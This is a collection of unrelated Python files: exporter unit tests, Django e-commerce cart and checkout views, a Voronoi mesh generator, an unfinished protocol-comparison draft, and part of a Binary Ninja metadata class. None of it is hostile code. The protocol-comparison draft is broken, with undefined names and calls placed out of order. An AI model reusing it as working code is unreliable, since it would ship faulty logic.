i2 = TestItem(name='bye', age='world')
f = BytesIO()
ie = PickleItemExporter(f)
ie.start_exporting()
ie.export_item(i1)
ie.export_item(i2)
ie.finish_exporting()
f.seek(0)
self.assertEqual(pickle.load(f), i1)
self.assertEqual(pickle.load(f), i2)
class CsvItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return CsvItemExporter(self.output, **kwargs)
def assertCsvEqual(self, first, second, msg=None):
csvsplit = lambda csv: [sorted(re.split(r'(,|\s+)', line))
for line in csv.splitlines(True)]
return self.assertEqual(csvsplit(first), csvsplit(second), msg)
def _check_output(self):
self.assertCsvEqual(self.output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n')
def test_header(self):
output = BytesIO()
ie = CsvItemExporter(output, fields_to_export=self.i.fields.keys())
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n')
output = BytesIO()
ie = CsvItemExporter(output, fields_to_export=['age'])
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age\r\n22\r\n')
output = BytesIO()
ie = CsvItemExporter(output)
ie.start_exporting()
ie.export_item(self.i)
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n22,John\xc2\xa3\r\n')
output = BytesIO()
ie = CsvItemExporter(output, include_headers_line=False)
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), '22,John\xc2\xa3\r\n')
def test_join_multivalue(self):
class TestItem2(Item):
name = Field()
friends = Field()
i = TestItem2(name='John', friends=['Mary', 'Paul'])
output = BytesIO()
ie = CsvItemExporter(output, include_headers_line=False)
ie.start_exporting()
ie.export_item(i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), '"Mary,Paul",John\r\n')
class XmlItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return XmlItemExporter(self.output, **kwargs)
def assertXmlEquivalent(self, first, second, msg=None):
def xmltuple(elem):
children = list(elem.iterchildren())
if children:
return [(child.tag, sorted(xmltuple(child)))
for child in children]
else:
return [(elem.tag, [(elem.text, ())])]
def xmlsplit(xmlcontent):
doc = lxml.etree.fromstring(xmlcontent)
return xmltuple(doc)
return self.assertEqual(xmlsplit(first), xmlsplit(second), msg)
def _check_output(self):
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n<items><item><age>22</age><name>John\xc2\xa3</name></item></items>'
self.assertXmlEquivalent(self.output.getvalue(), expected_value)
def test_multivalued_fields(self):
output = BytesIO()
item = TestItem(name=[u'John\xa3', u'Doe'])
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(item)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n<items><item><name><value>John\xc2\xa3</value><value>Doe</value></name></item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
def test_nested_item(self):
output = BytesIO()
i1 = TestItem(name=u'foo\xa3hoo', age='22')
i2 = TestItem(name=u'bar', age=i1)
i3 = TestItem(name=u'buz', age=i2)
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(i3)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n'\
'<items><item>'\
'<age>'\
'<age>'\
'<age>22</age>'\
'<name>foo\xc2\xa3hoo</name>'\
'</age>'\
'<name>bar</name>'\
'</age>'\
'<name>buz</name>'\
'</item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
def test_nested_list_item(self):
output = BytesIO()
i1 = TestItem(name=u'foo')
i2 = TestItem(name=u'bar')
i3 = TestItem(name=u'buz', age=[i1, i2])
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(i3)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n'\
'<items><item>'\
'<age>'\
'<value><name>foo</name></value>'\
'<value><name>bar</name></value>'\
'</age>'\
'<name>buz</name>'\
'</item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
class JsonLinesItemExporterTest(BaseItemExporterTest):
_expected_nested = {'name': u'Jesus', 'age': {'name': 'Maria', 'age': {'name': 'Joseph', 'age': '22'}}}
def _get_exporter(self, **kwargs):
return JsonLinesItemExporter(self.output, **kwargs)
def _check_output(self):
exported = json.loads(self.output.getvalue().strip())
self.assertEqual(exported, dict(self.i))
def test_nested_item(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
self.ie.start_exporting()
self.ie.export_item(i3)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
self.assertEqual(exported, self._expected_nested)
def test_extra_keywords(self):
self.ie = self._get_exporter(sort_keys=True)
self.test_export_item()
self._check_output()
self.assertRaises(TypeError, self._get_exporter, foo_unknown_keyword_bar=True)
class JsonItemExporterTest(JsonLinesItemExporterTest):
_expected_nested = [JsonLinesItemExporterTest._expected_nested]
def _get_exporter(self, **kwargs):
return JsonItemExporter(self.output, **kwargs)
def _check_output(self):
exported = json.loads(self.output.getvalue().strip())
self.assertEqual(exported, [dict(self.i)])
def test_two_items(self):
self.ie.start_exporting()
self.ie.export_item(self.i)
self.ie.export_item(self.i)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
self.assertEqual(exported, [dict(self.i), dict(self.i)])
def test_nested_item(self):
i1 = TestItem(name=u'Joseph\xa3', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
self.ie.start_exporting()
self.ie.export_item(i3)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
expected = {'name': u'Jesus', 'age': {'name': 'Maria', 'age': dict(i1)}}
self.assertEqual(exported, [expected])
class CustomItemExporterTest(unittest.TestCase):
def test_exporter_custom_serializer(self):
class CustomItemExporter(BaseItemExporter):
def serialize_field(self, field, name, value):
if name == 'age':
return str(int(value) + 1)
else:
return super(CustomItemExporter, self).serialize_field(field, \
name, value)
i = TestItem(name=u'John', age='22')
ie = CustomItemExporter()
self.assertEqual( \
ie.serialize_field(i.fields['name'], 'name', i['name']), 'John')
self.assertEqual(
ie.serialize_field(i.fields['age'], 'age', i['age']), '23')
if __name__ == '__main__':
unittest.main()
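# Hedged standalone example (outside the test harness): the exporters can be
# used directly on a byte stream.
#   buf = BytesIO()
#   exporter = CsvItemExporter(buf, fields_to_export=['name', 'age'])
#   exporter.start_exporting()
#   exporter.export_item(TestItem(name='John', age='22'))
#   exporter.finish_exporting()
#   buf.getvalue()  # 'name,age\r\nJohn,22\r\n'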
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.contrib import messages
from django.http import HttpResponseBadRequest, JsonResponse
from django.shortcuts import redirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.generic import FormView, TemplateView
from shop.modifiers.pool import cart_modifiers_pool
from shopit.forms import shop as shop_forms
from shopit.models.cart import Cart, CartItem
from shopit.models.modifier import DiscountCode
from shopit.models.order import Order
class CartObjectMixin(object):
"""
Cart object mixin adds cart, cart items and watch items to the context.
Resets the values from `extra` dict that are populated by the checkout.
"""
def dispatch(self, request, *args, **kwargs):
self.cart = Cart.objects.get_or_create_from_request(request)
for key in ['payment_modifier', 'shipping_modifier', 'annotation']:
self.cart.extra.pop(key, None)
self.update_cart()
self.cart.save()
return super(CartObjectMixin, self).dispatch(request, *args, **kwargs)
def update_cart(self):
self.cart._dirty = True
self.cart._cached_cart_items = None
self.cart.update(self.request)
def get_cart_data(self):
return {
'cart': self.cart,
'cart_items': self.cart._cached_cart_items,
'watch_items': CartItem.objects.filter_watch_items(self.cart, self.request),
}
def get_context_data(self, **kwargs):
context = super(CartObjectMixin, self).get_context_data(**kwargs)
context.update(self.get_cart_data())
return context
class CartView(CartObjectMixin, FormView):
"""
Cart view displays the cart and handles updating item's quantity,
deleting the cart and adding modifier codes to the cart.
"""
empty = False
form_class = shop_forms.CartDiscountCodeForm
template_name = 'shopit/shop/cart.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
if self.empty:
cart = Cart.objects.get_from_request(request)
for item in cart.items.all():
item.delete()
codes = []
for code in cart.get_discount_codes():
codes.append(code.code)
code.delete()
for dc in DiscountCode.objects.filter(code__in=codes):
dc.use(-1)
return super(CartView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
code = form.cleaned_data.get('code', None)
if code and self.request.POST.get('validate', None):
msg = _('Discount code is valid.')
else:
if code:
form.save()
msg = _('Discount code has been applied successfully.')
else:
msg = _('Cart has been updated successfully.')
messages.success(self.request, msg)
if self.request.is_ajax():
return JsonResponse({'success': msg})
return redirect('shopit-cart')
def form_invalid(self, form):
if self.request.is_ajax():
return JsonResponse(dict(form.errors), status=400)
return super(CartView, self).form_invalid(form)
def get_form_kwargs(self):
kwargs = super(CartView, self).get_form_kwargs()
kwargs['cart'] = self.cart
return kwargs
@method_decorator(csrf_protect)
def post(self, request, *args, **kwargs):
for item, quantity in [x for x in request.POST.items() if x[0].startswith('quantity') and x[1]]:
item, quantity = int(item.split('-').pop()), int(quantity)
item = CartItem.objects.get(pk=item)
if quantity > 0:
available, diff = item.product.is_available(quantity)
if available:
item.quantity = quantity
else:
item.quantity = quantity + diff
item.save()
else:
item.delete()
self.update_cart()
return super(CartView, self).post(request, *args, **kwargs)
class WatchView(CartObjectMixin, TemplateView):
template_name = 'shopit/shop/watch.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
return super(WatchView, self).dispatch(request, *args, **kwargs)
class CheckoutView(CartObjectMixin, FormView):
"""
Checkout view that handles customer selection forms and redirects to
purchase url of selected payment provider.
"""
template_name = 'shopit/shop/checkout.html'
def forms_valid(self, **forms):
"""
        All the forms are valid, make the purchase happen. Returns JSON.
"""
forms['customer_form'].save()
self.cart.shipping_address = forms['shipping_form'].save()
self.cart.billing_address = forms['billing_form'].save()
self.cart.extra.update(forms['payment_form'].cleaned_data)
self.cart.extra.update(forms['delivery_form'].cleaned_data)
self.cart.extra.update(forms['extra_form'].cleaned_data)
self.update_cart()
self.cart.save()
for modifier in cart_modifiers_pool.get_payment_modifiers():
if modifier.is_active(self.cart):
payment_provider = getattr(modifier, 'payment_provider', None)
if payment_provider:
expression = payment_provider.get_payment_request(self.cart, self.request)
return JsonResponse({'expression': expression})
return HttpResponseBadRequest()
def forms_invalid(self, **forms):
self.cart.save()
errors = dict([('%s-%s' % (x.prefix, y[0]), y[1]) for x in forms.values() for y in x.errors.items()])
return JsonResponse(errors, status=400)
@method_decorator(never_cache)
def get(self, request, *args, **kwargs):
response = super(CheckoutView, self).get(request, *args, **kwargs)
return response if not self.cart.is_empty else redirect('shopit-cart')
def get_context_data(self, **kwargs):
context = {'view': self}
context.update(self.get_cart_data())
context.update(self.get_forms())
context.update(kwargs)
return context
def get_forms(self, **kwargs):
kwargs['request'] = self.request
kwargs['cart'] = self.cart
forms = {
'shipping_form': shop_forms.ShippingAddressForm(prefix='shipping', **kwargs),
'billing_form': shop_forms.BillingAddressForm(prefix='billing', **kwargs),
'payment_form': shop_forms.PaymentMethodForm(prefix='payment', **kwargs),
'delivery_form': shop_forms.DeliveryMethodForm(prefix='delivery', **kwargs),
'extra_form': shop_forms.ExtraAnnotationForm(prefix='extra', **kwargs),
'accept_form': shop_forms.AcceptConditionForm(prefix='accept', **kwargs),
}
if self.request.customer.is_registered():
forms['customer_form'] = shop_forms.CustomerForm(prefix='customer', **kwargs)
else:
forms['customer_form'] = shop_forms.GuestForm(prefix='guest', **kwargs)
return forms
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def post(self, request, *args, **kwargs):
"""
Ment to be accessed via ajax, since the `get_payment_request` method
from the payment provider returns a javascript expression that needs
to be evaluated within javascript.
"""
if not request.is_ajax():
return HttpResponseBadRequest()
forms = self.get_forms(data=request.POST)
if all([x.is_valid() for x in forms.values()]):
return self.forms_valid(**forms)
return self.forms_invalid(**forms)
class ThanksView(TemplateView):
"""
A generic thank you view, adds last updated order to the context,
redirects to cart if no order.
"""
template_name = 'shopit/shop/thanks.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
self.order = Order.objects.filter_from_request(request).first()
if not self.order:
return redirect('shopit-cart')
return super(ThanksView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ThanksView, self).get_context_data(**kwargs)
context['order'] = self.order
return context
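# Hedged wiring sketch (a hypothetical urls.py, not part of this module);
# only the 'shopit-cart' name is referenced by the views above, the other
# names are illustrative assumptions:
#   urlpatterns = [
#       url(r'^cart/$', CartView.as_view(), name='shopit-cart'),
#       url(r'^cart/empty/$', CartView.as_view(empty=True), name='shopit-cart-empty'),
#       url(r'^watch/$', WatchView.as_view(), name='shopit-watch'),
#       url(r'^checkout/$', CheckoutView.as_view(), name='shopit-checkout'),
#       url(r'^thanks/$', ThanksView.as_view(), name='shopit-thanks'),
#   ]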
|
|
# Copyright 2016 Jochen Kursawe. See the LICENSE file at the top-level directory
# of this distribution and at https://github.com/kursawe/MCSTracker/blob/master/LICENSE.
import numpy as np
from ..core import *
from pyhull.voronoi import VoronoiTess # in maths type easy_install --user pyhull to make this work
def generate_random_tesselation(nx, ny, number_of_relaxation_steps = 4):
"""Generate a random tesselation of roughly nx times ny cells
Parameters
----------
nx : int
Approximate number of cells in x direction
ny : int
Approximate number of cells in y direction
number_of_relaxation_steps : int
In each relaxation step the centroids of the voronoi cells
are used as seeds for a new voronoi tesselation
Returns
-------
    mesh : Mesh type
        random mesh of roughly nx by ny cells
    This mesh generator will distribute random points in a plane of size
    nx x ny and create a voronoi tesselation from it. Then, number_of_relaxation_steps
    relaxation steps will be applied. In each relaxation step, the centroids of all
    voronoi cells will be collected and used as seeds for a new tesselation.
"""
mesh_generator = RandomTesselationGenerator(nx, ny, number_of_relaxation_steps)
return mesh_generator.generate_tesselation()
class RandomTesselationGenerator:
def __init__(self, nx, ny, number_of_relaxation_steps = 4):
"""A generator class for the generation of random tesslations.
For more detailed documentation of the input arguments see the
generate_random_tesselation function in this module
The constructor will not perform the voronoi tesselation and Lloyd relaxation.
To get the mesh call the function generate_tesselation() of this object.
"""
self.nx = nx
"""width of the sheet in x direction"""
self.ny = ny
"""width of the sheet in y direction"""
self.nx_with_dummies = nx + 8
""" We make the voronoi mesh bigger by 4 cells on each side in order
to avoid boundary effects in the mesh that we draw. This is then the
overall mesh dimension in x directions"""
self.ny_with_dummies = ny + 8
"""The overall mesh dimension in y direction"""
self.number_of_relaxation_steps = number_of_relaxation_steps
"""The number of voronoi relaxation steps that the generator should perform on the tesselation"""
self.current_mesh = None
"""after each iteration the generator will reset this internal variable"""
self.current_centroids = None
"""will be reset after each iteration"""
self.padding_centroid_positions = self.generate_padding_voronoi_centroids()
"""At each iteration, we put these additional centroids ad the outside of the mesh"""
self.voronoi_diagram = None
"""the full voronoi diagram after the current iteration"""
def generate_tesselation(self):
"""Generate and return the tesselation as prescribed by the arguments of the __init__() function
Returns
-------
random_mesh : Mesh type
a mesh object with based on random voronoi seeds of the requested size,
and where the requested number of Lloyd relaxation steps has been applied
"""
# First, we generate an initial tesselation. This is where the random seeds are made and the internal
# mesh variable are first written
self.generate_initial_tesselation()
# if the user does not request relaxation steps, just return this mesh
if ( self.number_of_relaxation_steps == 0 ):
            # we need to crop the mesh before we return it, i.e. cut off the regions and cells that we added
            # to hide boundary effects
return self.crop_and_return_mesh()
else:
# if relaxation steps are required we perform them
for iteration in range(self.number_of_relaxation_steps):
# get the centroids of the existing mesh
centroid_positions = []
for element in self.mesh.elements:
centroid_positions.append(element.calculate_centroid())
# add our padding centroids, i.e. two rows of regularly spaced centroids
# on the outside of the entire region of interest (which includes extra space and cells)
all_centroid_positions = np.vstack((np.array(centroid_positions),
self.padding_centroid_positions))
# We generate a Voronoi tesselation of that
self.voronoi_diagram = VoronoiTess(all_centroid_positions)
# now we clean up that voronoi tesselation and set the mesh in the generator
self.remove_padding_cells_from_voronoi_diagram_and_create_mesh()
# after we went through the iterations we can crop and return the mesh
return self.crop_and_return_mesh()
def crop_and_return_mesh(self):
"""We generated a (Lloyd relaxed) voronoi mesh that is larger than the requested mesh.
Here, we cut off all the extra cells
The method works by drawing a completely new mesh."""
# Let's make a list of new elements for the new mesh
new_elements = []
# a dictionary where keys are ids of old nodes and values are new nodes
# at the same position. New nodes are required because we currently don't have functionality to
# delete elements from nodes (shouldn't be difficult to implement, but also didn't seem necessary
# here)
node_dictionary = {}
for old_element in self.mesh.elements:
this_centroid = old_element.calculate_centroid()
# if this centroid is inside the box of interest, create an identical new element
if ( not( this_centroid[0] < 0.5 or this_centroid[0] > ( self.nx + 0.5 )
or this_centroid[1] < 0.5 or this_centroid[1] > (self.ny + 0.5) )):
new_element_nodes = []
for node in old_element.nodes:
if node.id not in node_dictionary:
# The new node has the same position as the old node
node_dictionary[node.id] = Node(node.position)
new_element_nodes.append(node_dictionary[node.id])
new_elements.append(Element(new_element_nodes))
return Mesh(node_dictionary.values(), new_elements)
def generate_initial_tesselation(self):
"""Generate the initial tesselation.
In this method we distribute nx_with_dummies*ny_with_dummies points randomly in a box of
dimension [nx_with_dummies, ny_with_dummies]. We then add the padding centroids on the outside
        of the box to `cut off' infinity. Finally, we take the voronoi tesselation of all these centroids,
and remove the voronoi cells originating from the padding centroids from this tesselation.
This is designed such that the average area of the remaining cells should be one.
"""
        total_number_of_random_points_to_create = self.nx_with_dummies * self.ny_with_dummies
# We make a mesh of cell centroids.
# First we get an array with random entries between 0 and 1 in x and y directions of correct length
centroid_positions = np.random.rand(total_number_of_random_points_to_create, 2)
# Then we blow this array up to the correct dimensions in x and y
centroid_positions[:,0] *= self.nx_with_dummies
centroid_positions[:,1] *= self.ny_with_dummies
# and we shift the mesh such that the bottom and left added space is negative
centroid_positions[:,0] -= 3.5
centroid_positions[:,1] -= 3.5
# the region with the centroids now spreads from -3.5 to (self.[nx/ny] + 4.5) so that we can add padding
# cells at integer coordinates, i.e -4 and self.[nx/ny] + 5
# Now we add some padding cells on the outside.
centroid_positions = np.vstack((centroid_positions, self.padding_centroid_positions))
# We generate a Voronoi tesselation of that
self.voronoi_diagram = VoronoiTess(centroid_positions)
# now we clean up this voronoi tesselation and set the mesh of the generator
# cleaning up means we remove the voronoi cells originating from the padding seeds
self.remove_padding_cells_from_voronoi_diagram_and_create_mesh()
def remove_padding_cells_from_voronoi_diagram_and_create_mesh(self):
"""This function interrogates the internal voronoi_diagram and creates a Mesh class object instance from it.
This mesh will not include the cells that were added for padding to cut off infinity.
"""
# Let's get all vertices
all_vertices = np.array(self.voronoi_diagram.vertices)
# and all regions
all_regions = self.voronoi_diagram.regions
# now, let's make a new array of vertices and a new array of regions
new_vertices = []
new_elements = []
index_map = [-1]*all_vertices.shape[0]
current_number_of_new_vertices = 0
# Loop over all regions and filter all regions that come from the dummy indices
# this relies on the voronoi diagram indexing the regions and voronoi points in the same order
for region_index, voronoi_centre in enumerate(self.voronoi_diagram.points):
# if this voronoi centre is inside the box (including the dummies)
if ( not( voronoi_centre[0] < -3.5 or voronoi_centre[0] > self.nx + 4 + 0.5
or voronoi_centre[1] < -3.5 or voronoi_centre[1] > self.ny + 4 + 0.5 )):
new_region = []
for vertex_index in self.voronoi_diagram.regions[region_index]:
# if the index is not in the new vertices, add it
if (index_map[vertex_index] == -1):
this_node = Node(all_vertices[vertex_index])
new_vertices.append(this_node)
index_map[vertex_index] = current_number_of_new_vertices
# and add it to the new region
new_region.append(this_node)
current_number_of_new_vertices += 1
else:
# if it is in the new vertices though then add
# the right vertex to the new region
new_region.append(new_vertices[index_map[vertex_index]])
# lets make an element from that region and add it to the list of elements
this_element = Element(new_region)
new_elements.append(this_element)
# ensure that all the vertices in each element are ordered counterclockwise
for element in new_elements:
area = element.calculate_area()
if area < 0:
element.nodes.reverse()
# now we have made all the nodes and elements for the mesh, and associated them.
# Time to generate the mesh and set the member variable for further processing
self.mesh = Mesh(new_vertices, new_elements)
def generate_padding_voronoi_centroids(self):
"""Generate 2 rows or colomns on all sides of the nx_with_dummies x ny_with_dummies grid to seal
the voronoi tesselation from infinity.
The returned centroids will form two rows around the grid, the inner row
will have integer coordinates, the outer row will be shifted by 0.5 in x direction
on the top and the bottom, and shifted by 0.5 in y direction on the left and the right.
        The grid dimensions are taken from the nx and ny attributes of this
        generator.
        Returns
        -------
        padding_centroids : numpy array
            list of centroids of the points making up the padding.
"""
# 2 extra rows of cells at the top
x_positions = np.arange( -5, self.nx + 7 )
top_row_one = np.zeros( ( self.nx_with_dummies + 4, 2 ) )
top_row_one[:, 0] = x_positions
top_row_one[:, 1] = self.ny + 5
top_row_two = np.zeros( ( self.nx_with_dummies + 4 + 1, 2 ) )
top_row_two[:,1] = self.ny + 6
top_row_two[1:, 0] = (x_positions + 0.5)
top_row_two[0, 0] = -5.5
# 2 extra rows of cells at the bottom
bottom_row_one = np.zeros( ( self.nx_with_dummies + 4, 2 ) )
bottom_row_one[:, 0] = x_positions
bottom_row_one[:, 1] = - 4
bottom_row_two = np.zeros( ( self.nx_with_dummies + 4 + 1, 2 ) )
bottom_row_two[:, 1] = - 5
bottom_row_two[1:, 0] = (x_positions + 0.5)
bottom_row_two[0,0] = -5.5
# 2 extra rows left
y_positions = np.arange( -3 , self.ny + 5 )
left_row_one = np.zeros( ( self.ny_with_dummies , 2 ) )
left_row_one[:,1] = y_positions
left_row_one[:,0] = -4
left_row_two = np.zeros( ( self.ny_with_dummies + 1, 2) )
left_row_two[1:, 1] = y_positions + 0.5
left_row_two[0, 1] = -4.5
left_row_two[:, 0] = -5
# and 2 extra rows on the right
right_row_one = np.zeros( ( self.ny_with_dummies , 2) )
right_row_one[:,1] = y_positions
right_row_one[:,0] = self.nx + 5
right_row_two = np.zeros( ( self.ny_with_dummies + 1, 2) )
right_row_two[1:, 1] = y_positions + 0.5
right_row_two[0, 1] = - 4.5
right_row_two[:, 0] = self.nx + 6
all_padding_centroids = np.vstack((right_row_one, right_row_two,
left_row_one, left_row_two,
bottom_row_one, bottom_row_two,
top_row_one, top_row_two))
return all_padding_centroids
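# Hedged usage sketch of the generator above:
#   mesh = generate_random_tesselation(5, 5, number_of_relaxation_steps=2)
#   print len(mesh.elements)  # roughly 5 * 5 = 25 cells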
|
|
import pygraphviz as pgv
from protocols.models import Protocol
def compare_protocols(protocol_A,protocol_B):
'''compare two protocols side by side
both protocols come from the same template
no complex diff, only layout
'''
reagent_verbs = ['add', 'combine']
machine_verbs = ['heat', 'chill', 'centrifuge', 'spin']
try:
protA = Protocol.objects.get(name__icontains=protocol_A)
protB = Protocol.objects.get(name__icontains=protocol_B)
    except Protocol.DoesNotExist:
        return 'not in DB, try again'
# are the action trees identical?
# confirm action_tree lengths before starting main compare loop:
    actions_A = protA.get_action_tree()
    actions_B = protB.get_action_tree()
    NUM_ACTIONS = len(actions_A)
    if len(actions_A) != len(actions_B):
        return "protocols don't have the same length"
    '''Score is accumulated through the compare:
    If all action sequences are the same: actions = 1; else actions = 0 (to handle later).
    If all attribute keys per action are the same: attribute_keys = 1; else attribute_keys = similar/total.
    If all attribute values per action are the same: attribute_values = 1; else attribute_values = similar/total.
    If the verb of the action is the same, the output will look like
    [step_num, action_num, verb_a[objectid], verb_b[objectid], attribute_key_score, attribute_value_score]
    Attribute compare:
        if all attribute_keys are the same:
            if verb is add or combine:
                compare the reagent lists
    '''
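    def compare_machines(location_A, location_B):
        # Hypothetical placeholder, not in the original draft (which calls
        # compare_machines without ever defining it): a real version would
        # mirror compare_reagents for machine attributes such as temperature,
        # speed or duration.
        return None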
    # Start main loop (note: compare_reagents is defined below in the draft's
    # original order; it must be hoisted above this loop before running):
    for i in range(NUM_ACTIONS):
        if actions_A[i][2] == actions_B[i][2]:  # verb name is the same
            if actions_A[i][2] in reagent_verbs:
                rank = compare_reagents(actions_A[i], actions_B[i])
            if actions_A[i][2] in machine_verbs:
                rank = compare_machines(actions_A[i], actions_B[i])
    def compare_reagents(location_A, location_B):
        # check that both actions carry a 'component - list':
        a = protA.steps[location_A[0]]['actions'][location_A[1]]
        b = protB.steps[location_B[0]]['actions'][location_B[1]]
        if 'component - list' in a.keys() and 'component - list' in b.keys():
            # collect the reagent names as sets so set operations work:
            ar = set(c['reagent_name'] for c in a['component - list'])
            br = set(c['reagent_name'] for c in b['component - list'])
            # compare reagent names
            diff_name = ar.symmetric_difference(br)
            same_name = ar.intersection(br)
            # TODO: compare reagent suppliers
            # TODO: compare reagent concentrations
            # TODO: compare reagent volumes
            # TODO: compare reagent quantities
# # find different keys():
# a = set(protA.steps[actions_A[i][0]]['actions'][actions_A[i][1]].keys())
# b = set(protB.steps[actions_B[i][0]]['actions'][actions_B[i][1]].keys())
# if len(a.symmetric_difference(b)) == 0:
# # no key difference, move to values difference
# for i in a:
# if type(a) ==unicode and type(b) == unicode:
# if a[i] == b[i]
        # loop through actions:
        # find verb-type compatibilities
        # determine what type of verb it is: component or machine.
        # if both match verb-type, make a dim connector and add both to the same rank
        # identifying an edge:
        # (a.nodes('oy38e9')['verb'], a.nodes('oy38e9')['verb'])
        # if they differ in key numbers, change the color of the square
        # compare both children:
        # if they match, color both verbs in green
        # if they don't, display both, highlighting the diff in red and the same in green
        a_actions = [r[2] for r in a.get_action_tree('objectid')]
        b_actions = [r[2] for r in b.get_action_tree('objectid')]
        comparator = []
        for idxa in a_actions:
            # comparators: name, type of child, previous sibling, next sibling
            a_name = a.nodes[idxa]['verb']
            if 'machines' in a.nodes[idxa]['verb'].keys():
                a_type = 'machine'
                a_child = a.nodes[idxa]['machine']['objectid']
            else:
                a_type = 'components'
                a_child = a.nodes[idxa]['components']['objectid']
            a_parent = a.nodes[idxa].parent['objectid']  # pointer to the step object
            idx_of_a = a_actions.index(idxa)
            if idx_of_a == 0:
                a_previous = None
                a_next = 1
            elif idx_of_a == len(a_actions) - 1:
                a_previous = idx_of_a - 1
                a_next = None
            else:
                a_previous = idx_of_a - 1
                a_next = idx_of_a + 1
            for idxb in b_actions:
                b_name = b.nodes[idxb]['verb']
                if 'machines' in b.nodes[idxb]['verb'].keys():
                    b_type = 'machine'
                    b_child = b.nodes[idxb]['machine']['objectid']
                else:
                    b_type = 'components'
                    b_child = b.nodes[idxb]['components']['objectid']
                b_parent = b.nodes[idxb].parent['objectid']  # pointer to the step object
                idx_of_b = b_actions.index(idxb)
                if idx_of_b == 0:
                    b_previous = None
                    b_next = 1
                elif idx_of_b == len(b_actions) - 1:
                    b_previous = idx_of_b - 1
                    b_next = None
                else:
                    b_previous = idx_of_b - 1
                    b_next = idx_of_b + 1
                # compare the edge content:
                edges = (a_name == b_name and a_type == b_type)
                # if a_type == b_type: call an action to compare the contents of both.
                # compare relatives (guard the ends of the action lists):
                if a_previous is not None and b_previous is not None:
                    previous = (a.nodes[a_actions[a_previous]]['name'] ==
                                b.nodes[b_actions[b_previous]]['name'])
                else:
                    previous = a_previous == b_previous
                if a_next is not None and b_next is not None:
                    next_same = (a.nodes[a_actions[a_next]]['name'] ==
                                 b.nodes[b_actions[b_next]]['name'])
                else:
                    next_same = a_next == b_next
                if edges and previous and next_same:
                    comparator.append([idxa, idxb, 3])
                elif edges and previous:
                    comparator.append([idxa, idxb, 0])
                elif edges and next_same:
                    comparator.append([idxa, idxb, 1])
|
|
# Copyright (c) 2015-2021 Vector 35 Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import absolute_import
import ctypes
# Binary Ninja components
from binaryninja import _binaryninjacore as core
from binaryninja.enums import MetadataType
# 2-3 compatibility
from binaryninja import range
from binaryninja import pyNativeStr
import numbers
class Metadata(object):
def __init__(self, value=None, signed=None, raw=None, handle=None):
if handle is not None:
self.handle = handle
        elif isinstance(value, bool):
            # bool must come before the Integral check: bool subclasses int,
            # so the Integral branch would otherwise swallow booleans.
            self.handle = core.BNCreateMetadataBooleanData(value)
        elif isinstance(value, numbers.Integral):
            if signed:
                self.handle = core.BNCreateMetadataSignedIntegerData(value)
            else:
                self.handle = core.BNCreateMetadataUnsignedIntegerData(value)
elif isinstance(value, (str, bytes)):
if raw:
if isinstance(value, str):
value = bytes(bytearray(ord(i) for i in value))
buffer = (ctypes.c_ubyte * len(value)).from_buffer_copy(value)
self.handle = core.BNCreateMetadataRawData(buffer, len(value))
else:
self.handle = core.BNCreateMetadataStringData(value)
elif isinstance(value, float):
self.handle = core.BNCreateMetadataDoubleData(value)
elif isinstance(value, (list, tuple)):
self.handle = core.BNCreateMetadataOfType(MetadataType.ArrayDataType)
for elm in value:
md = Metadata(elm, signed, raw)
